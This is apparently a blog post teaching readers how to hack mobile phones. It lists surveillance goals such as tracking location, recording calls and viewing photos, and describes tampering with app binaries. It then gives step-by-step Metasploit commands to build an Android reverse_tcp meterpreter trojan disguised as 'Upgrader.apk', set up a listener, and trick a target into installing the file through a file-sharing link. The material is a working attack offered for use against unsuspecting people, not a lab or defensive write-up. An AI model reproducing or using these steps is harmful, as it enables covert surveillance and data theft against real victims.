Mobile hacking makes perfect sense because of the rise of smartphone and other mobile devices for online transactions and connecting with others. Since mobile devices are hubs of personal information that are easier to access compared to personal computers, they are among the most vulnerable devices for hackers.
Why should you hack mobile devices? Different types of mobile device hacks allow you to do the following:
1. Track the location of the target through the installed GPS service or cell ID tracking.
2. Access emails and record phone conversations
3. Understand the target’s web browsing behavior
4. View all content stored in the device, including photos
5. Send remote commands to mobile devices
6. Use it to send deceptive messages or phone calls
Hacking Mobile Apps
If you think like a hacker, you will realize that one of the easiest ways to get into several mobile devices and set up shop in there is to create a mobile app.
Mobile app hacking is among the fastest ways to infiltrate a mobile device system since it is easy to upload a malicious app online and make it possible for people to download the hack, without even thinking if they should examine their download or not. Mobile apps are also considered as “low-hanging fruit.” Most mobile apps can be directly accessed through their binary codes, or the code that mobile devices need in order to execute the app. That means that that everyone who has their hands on to marketed hacking tools are able to exploit available mobile apps and turn them into hacking tools. Once hackers are able to compromise a mobile app, they will be able to perform the initial compromise within minutes.
Here are some ways how hackers exploit binary codes in mobile apps:
1. Modify the code to modify behavior
When hackers modify the binary code, they do that to disable the app’s security controls, requirements for purchasing, or prompts for ads to display. When they are able to do that, they can distribute the modified app as a crack, a new application, or a patch
2. Inject malicious code
When hackers are able to get their hands on a binary code, they can inject a malicious code in it and then distribute it as an app update or a patch. Doing this can confuse a user into thinking that he is merely updating the app in his mobile devise, but in reality, the hacker has engineered the user into installing an entirely different app.
3. Create a rogue app
Hackers can perform a drive-by attack, which is possible by doing an API/function hooking or swizzling. When this is done, the hacker will be able to successfully compromise the targeted application and make redirecting the traffic or stealing user credentials possible.
4. Do reverse engineering
A hacker that has access to a binary code can easily perform a reverse-engineering hack to expose nfurther vulnerabilities, do similar counterfeit apps, or even resubmit it under new branding.
Exploiting a Mobile Device Remotely
Kali Linux, a known toolkit for exploiting computers, is also one of the most efficient tools to perform a hack on a mobile device. Follow these steps to perform a remote hack on a mobile device and install a malicious file on a targeted device.
1. Pull up Kali Linux
Type the following command: msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R >/root/Upgrader.apk
2. Pull up a new terminal
While Kali is creating your file, load another terminal and load the metasploit console. To do that, enter the command: Msfconsole
3. Set up the listener
Once metasploit is up, load the multi-handler exploit by entering the command: use exploit/multi/handler
Afterward, create the reverse payload by typing the following command: set payload android/meterpreter/reverse_tcp
Next, you will need to set up the L host type in order for you to start receiving traffic. To do that, type the following command:
set LHOST [Your device’s IP address]
4. Start the exploit
Now that you have your listener ready, you can now start your exploit by activating your listener. To do this, type the command:
Exploit
If the malicious file or Trojan that you have created a while ago is ready, copy it from the root folder to your mobile device, preferably an android phone. Afterwards, make that file available by uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target, and ask him to install the app.Once your target user has installed the file, you can now receive the traffic that he is receiving through his mobile device!
ela
ReplyDelete